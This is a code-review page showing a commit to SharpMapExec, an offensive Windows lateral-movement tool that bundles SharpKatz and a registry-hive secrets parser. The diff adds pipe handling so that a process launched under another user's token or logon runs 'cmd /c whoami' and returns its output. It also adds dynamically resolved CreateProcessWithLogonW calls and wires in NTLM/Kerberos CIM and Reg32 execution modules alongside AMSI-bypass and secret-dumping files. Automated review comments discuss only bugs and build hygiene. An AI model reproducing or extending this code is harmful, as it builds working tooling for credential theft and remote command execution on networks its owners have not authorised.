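  IntPtr hToken = IntPtr.Zero;
@@ -138,6 +164,8 @@
  if (data.isReplaceOk)
  {
  NtResumeProcess(pi.hProcess);
+ WriteToPipe(hStdInWrite, "/c whoami");
+ Console.WriteLine(ReadFromPipe(pi.hProcess, hStdOutRead, Encoding.GetEncoding(GetConsoleOutputCP())));
  return procid;
  }
  else
@@ -189,17 +217,83 @@
  }
  }
 
- public static bool CreateProcessWithLogonW(string username, string password, string domain, string path, string binary, string arguments, CreationFlags cf, ref PROCESS_INFORMATION processInformation)
+ public static bool WriteToPipe(IntPtr hStdInWrite, string command)
  {
- STARTUPINFO startupInfo = new STARTUPINFO();
- startupInfo.cb = (uint)Marshal.SizeOf(typeof(STARTUPINFO));
- processInformation = new PROCESS_INFORMATION();
- if (!Win32.Natives.CreateProcessWithLogonW(username, domain, password,
- LogonFlags.NetCredentialsOnly, path + binary, path + binary + " " + arguments, cf, 0, path, ref startupInfo, out processInformation))
+ uint outbytes;
+ byte[] cb = Encoding.ASCII.GetBytes(command + "\n\r");
+ if (!WriteFile(hStdInWrite, cb, (uint)cb.Length, out outbytes, IntPtr.Zero))
  {
+ Console.WriteLine(" [!] WriteFile failed to execute!: {0}", Marshal.GetLastWin32Error());
  return false;
  }
  return true;
  }
+
+ public static string ReadFromPipe(IntPtr hProcess, IntPtr hStdOutRead, Encoding encoding)
+ {
+ SafeFileHandle safeHandle = new SafeFileHandle(hStdOutRead, false);
+ var reader = new StreamReader(new FileStream(safeHandle, FileAccess.Read, 4096, false), encoding, true);
+ string result = "";
+ bool exit = false;
+ try
+ {
+ do
+ {
+ if (WaitForSingleObject(hProcess, 100) == 0)
+ {
+ exit = true;
+ }
+
+ char[] buf = null;
+ int bytesRead;
+
+ uint bytesToRead = 0;
+
+ bool peekRet = PeekNamedPipe(hStdOutRead, IntPtr.Zero, IntPtr.Zero, IntPtr.Zero, ref bytesToRead, IntPtr.Zero);
+
+ if (peekRet == true && bytesToRead == 0)
+ {
+ if (exit == true)
+ {
+ break;
+ }
+ else
+ {
+ continue;
+ }
+ }
+
+ if (bytesToRead > 4096)
+ bytesToRead = 4096;
+
+ buf = new char[bytesToRead];
+ bytesRead = reader.Read(buf, 0, buf.Length);
+ if (bytesRead > 0)
+ {
+ result += new string(buf);
+ }
+
+ } while (true);
+ reader.Close();
+ }
+ finally
+ {
+ if (!safeHandle.IsClosed)
+ {
+ safeHandle.Close();
+ }
+ }
+ return result;
+ }
+
+ //public static bool CreateProcessWithLogonW(string username, string password, string domain, string path, string binary, string arguments, CreationFlags cf, ref PROCESS_INFORMATION processInformation)
+ //{
+ //
+ // if (!)
+ // {
+ // return false;
+ // }
+ // return true;
+ //}
  }
 }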
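Review bot: `ReadFromPipe` has no exit when `PeekNamedPipe` returns false: `bytesToRead` stays 0, the `peekRet == true && bytesToRead == 0` branch is skipped, a zero-length read follows, and the `do … while (true)` loop never ends. A guard such as `if (!peekRet) break;` right after the peek closes that path. The append `result += new string(buf);` also copies the whole buffer even when `reader.Read` returned fewer characters, which pads the output with NUL characters; `result += new string(buf, 0, bytesRead);` keeps only what was read. Separately, in the earlier hunk the return values of both `CreatePipe` calls are ignored and none of the four pipe handles is closed in the visible lines, so a failed pipe creation goes unnoticed and the handles appear to leak.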
  • ■ ■ ■ ■ ■ ■
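--- a/SharpMapExec/Projects/SharpKatz/Win32/Natives.cs
+++ b/SharpMapExec/Projects/SharpKatz/Win32/Natives.cs
@@ -2257,6 +2257,13 @@
  return CreateProcessWithLogonW(userName, domain, password, dwLogonFlags, applicationName, commandLine, dwCreationFlags, environment, currentDirectory, ref startupInfo, out processInformation);
  }
 
+ public static bool CreateProcessWithLogonW(string userName, string domain, string password, LogonFlags dwLogonFlags, string applicationName, string commandLine, CreationFlags dwCreationFlags, uint environment, string currentDirectory, ref STARTUPINFOEX startupInfoEx, out PROCESS_INFORMATION processInformation)
+ {
+ IntPtr proc = GetProcAddress(GetAdvapi32(), "CreateProcessWithLogonW");
+ SysCall.Delegates.CreateProcessWithLogonWW CreateProcessWithLogonW = (SysCall.Delegates.CreateProcessWithLogonWW)Marshal.GetDelegateForFunctionPointer(proc, typeof(SysCall.Delegates.CreateProcessWithLogonWW));
+ return CreateProcessWithLogonW(userName, domain, password, dwLogonFlags, applicationName, commandLine, dwCreationFlags, environment, currentDirectory, ref startupInfoEx, out processInformation);
+ }
+
  public static bool DuplicateTokenEx(IntPtr hExistingToken, uint dwDesiredAccess, ref SECURITY_ATTRIBUTES lpTokenAttributes, int ImpersonationLevel, int TokenType, ref IntPtr phNewToken)
  {
  IntPtr proc = GetProcAddress(GetKernelbase(), "DuplicateTokenEx");
@@ -2328,6 +2335,40 @@
  IntPtr proc = GetProcAddress(GetAdvapi32(), "ImpersonateLoggedOnUser");
  SysCall.Delegates.ImpersonateLoggedOnUser ImpersonateLoggedOnUser = (SysCall.Delegates.ImpersonateLoggedOnUser)Marshal.GetDelegateForFunctionPointer(proc, typeof(SysCall.Delegates.ImpersonateLoggedOnUser));
  return ImpersonateLoggedOnUser(hToken);
+ }
+
+ //
+ [DllImport("kernel32.dll")]
+ public static extern bool CreatePipe(out IntPtr phReadPipe, out IntPtr phWritePipe, ref SECURITY_ATTRIBUTES lpPipeAttributes, uint nSize);
+
+ [DllImport("kernel32.dll", SetLastError = true)]
+ public static extern bool SetHandleInformation(IntPtr hObject, HANDLE_FLAGS dwMask, HANDLE_FLAGS dwFlags);
+
+ [DllImport("kernel32.dll", SetLastError = true)]
+ public static extern bool PeekNamedPipe(IntPtr handle, IntPtr buffer, IntPtr nBufferSize, IntPtr bytesRead, ref uint bytesAvail, IntPtr BytesLeftThisMessage);
+
+ [DllImport("kernel32.dll", CharSet = CharSet.Auto, SetLastError = true)]
+ public static extern int GetConsoleOutputCP();
+
+ [DllImport("kernel32.dll", SetLastError = true)]
+ public static extern UInt32 WaitForSingleObject(IntPtr handle, UInt32 milliseconds);
+
+ [DllImport("kernel32.dll")]
+ public static extern bool WriteFile(IntPtr hFile, byte[] buffer, UInt32 nNumberOfBytesToWrite, out UInt32 lpNumberOfBytesWritten, [In] IntPtr lpOverlapped);
+
+ [Flags]
+ public enum HANDLE_FLAGS : uint
+ {
+ None = 0,
+ INHERIT = 1,
+ PROTECT_FROM_CLOSE = 2
+ }
+
+ [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
+ public struct STARTUPINFOEX
+ {
+ public STARTUPINFO StartupInfo;
+ public IntPtr lpAttributeList;
  }
  }
 }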
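Review bot: The `WriteFile` and `CreatePipe` imports are declared with `[DllImport("kernel32.dll")]` and no `SetLastError = true`, yet `WriteToPipe` in Ptp.cs prints `Marshal.GetLastWin32Error()` when `WriteFile` fails. Without that flag the runtime does not capture the thread's last error after the call, so the logged code is not reliable. Both should read `[DllImport("kernel32.dll", SetLastError = true)]`, matching the other imports added in this hunk. `GetConsoleOutputCP` takes no string arguments, so its `CharSet = CharSet.Auto` has no effect and can be dropped.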
  • ■ ■ ■ ■ ■ ■
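--- a/SharpMapExec/Projects/SharpKatz/Win32/Syscall.cs
+++ b/SharpMapExec/Projects/SharpKatz/Win32/Syscall.cs
@@ -440,6 +440,10 @@
  public delegate bool CreateProcessWithLogonW(string userName, string domain, string password, LogonFlags dwLogonFlags, string applicationName, string commandLine, CreationFlags dwCreationFlags, uint environment, string currentDirectory, ref STARTUPINFO startupInfo, out PROCESS_INFORMATION processInformation);
 
  [SuppressUnmanagedCodeSecurity]
+ [UnmanagedFunctionPointer(CallingConvention.StdCall, CharSet = CharSet.Unicode)]
+ public delegate bool CreateProcessWithLogonWW(string userName, string domain, string password, LogonFlags dwLogonFlags, string applicationName, string commandLine, CreationFlags dwCreationFlags, uint environment, string currentDirectory, ref STARTUPINFOEX startupInfo, out PROCESS_INFORMATION processInformation);
+
+ [SuppressUnmanagedCodeSecurity]
  [UnmanagedFunctionPointer(CallingConvention.StdCall)]
  public delegate bool DuplicateTokenEx(IntPtr hExistingToken, uint dwDesiredAccess, ref SECURITY_ATTRIBUTES lpTokenAttributes, int ImpersonationLevel, int TokenType, ref IntPtr phNewToken);
 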
  • ■ ■ ■ ■ ■
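--- a/SharpMapExec/SharpMapExec.csproj
+++ b/SharpMapExec/SharpMapExec.csproj
@@ -40,6 +40,9 @@
  <Reference Include="Microsoft.Dynamic, Version=1.3.0.0, Culture=neutral, PublicKeyToken=7f709c5b713576e1, processorArchitecture=MSIL">
  <HintPath>..\packages\DynamicLanguageRuntime.1.3.0\lib\net45\Microsoft.Dynamic.dll</HintPath>
  </Reference>
+ <Reference Include="Microsoft.Management.Infrastructure, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL">
+ <HintPath>..\packages\Microsoft.Management.Infrastructure.4.0.0\lib\Microsoft.Management.Infrastructure.dll</HintPath>
+ </Reference>
  <Reference Include="Microsoft.Scripting, Version=1.3.0.0, Culture=neutral, PublicKeyToken=7f709c5b713576e1, processorArchitecture=MSIL">
  <HintPath>..\packages\DynamicLanguageRuntime.1.3.0\lib\net45\Microsoft.Scripting.dll</HintPath>
  </Reference>
@@ -69,12 +72,15 @@
  <Compile Include="Args\ArgumentParserResult.cs" />
  <Compile Include="Args\CommandCollection.cs" />
  <Compile Include="Args\Info.cs" />
+ <Compile Include="Commands\kerberosReg32.cs" />
  <Compile Include="Commands\KerberosTgtdeleg.cs" />
  <Compile Include="Commands\ICommand.cs" />
  <Compile Include="Commands\kerberosSmb.cs" />
  <Compile Include="Commands\KerberosSpray.cs" />
  <Compile Include="Commands\kerberosWinrm.cs" />
+ <Compile Include="Commands\NtlmReg32.cs" />
  <Compile Include="Commands\NtlmSmb.cs" />
+ <Compile Include="Commands\NtlmCim.cs" />
  <Compile Include="Commands\NtlmWinrm.cs" />
  <Compile Include="Helpers\AmsiFail.cs" />
  <Compile Include="Helpers\Misc.cs" />
@@ -82,6 +88,9 @@
  <Compile Include="Helpers\Tasks.cs" />
  <Compile Include="Helpers\Impersonator.cs" />
  <Compile Include="Helpers\Jea.cs" />
+ <Compile Include="Lib\Cim.cs" />
+ <Compile Include="Lib\Reg32.cs" />
+ <Compile Include="Lib\Scan.cs" />
  <Compile Include="Projects\HiveParser\Crypto.cs" />
  <Compile Include="Projects\HiveParser\LsaSecret.cs" />
  <Compile Include="Projects\HiveParser\NL_Record.cs" />
@@ -89,10 +98,8 @@
  <Compile Include="Projects\HiveParser\Registry.cs" />
  <Compile Include="Projects\HiveParser\RegistryHive.cs" />
  <Compile Include="Projects\HiveParser\ValueKey.cs" />
- <Compile Include="Lib\KerberosSmb.cs" />
- <Compile Include="Lib\KerberosWinrm.cs" />
- <Compile Include="Lib\NtlmSmb.cs" />
- <Compile Include="Lib\NtlmWinrm.cs" />
+ <Compile Include="Lib\Kerberos.cs" />
+ <Compile Include="Lib\Ntlm.cs" />
  <Compile Include="Lib\Secrets.cs" />
  <Compile Include="Lib\Smb.cs" />
  <Compile Include="Lib\Wsman.cs" />
@@ -241,6 +248,7 @@
  </ItemGroup>
  <ItemGroup>
  <None Include="Helpers\JeaRules.ps1" />
+ <None Include="packages.config" />
  </ItemGroup>
  <Import Project="$(MSBuildToolsPath)\Microsoft.CSharp.targets" />
 </Project>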
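Review bot: The new `Microsoft.Management.Infrastructure` reference resolves through a `HintPath` into `..\packages\`, and this commit also checks that package's `.nupkg` and DLL into the repository as binary files. A build therefore links whatever binary sits in the tree, and the visible parts of the project file have no step that checks it against the published package. I would keep `packages.config` as the record of the dependency, restore the package from the feed at build time, and keep `packages/`, `.vs/` and `obj/` out of version control through the ignore file.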
  • SharpMapExec/obj/Release/DesignTimeResolveAssemblyReferencesInput.cache
    Binary file.
  • ■ ■ ■ ■ ■ ■
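--- a/SharpMapExec/packages.config
+++ b/SharpMapExec/packages.config
@@ -0,0 +1,4 @@
+<?xml version="1.0" encoding="utf-8"?>
+<packages>
+ <package id="Microsoft.Management.Infrastructure" version="4.0.0" targetFramework="net45" />
+</packages>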
  • packages/Microsoft.Management.Infrastructure.4.0.0/.signature.p7s
    Binary file.
  • packages/Microsoft.Management.Infrastructure.4.0.0/Microsoft.Management.Infrastructure.4.0.0.nupkg
    Binary file.
  • packages/Microsoft.Management.Infrastructure.4.0.0/lib/Microsoft.Management.Infrastructure.dll
    Binary file.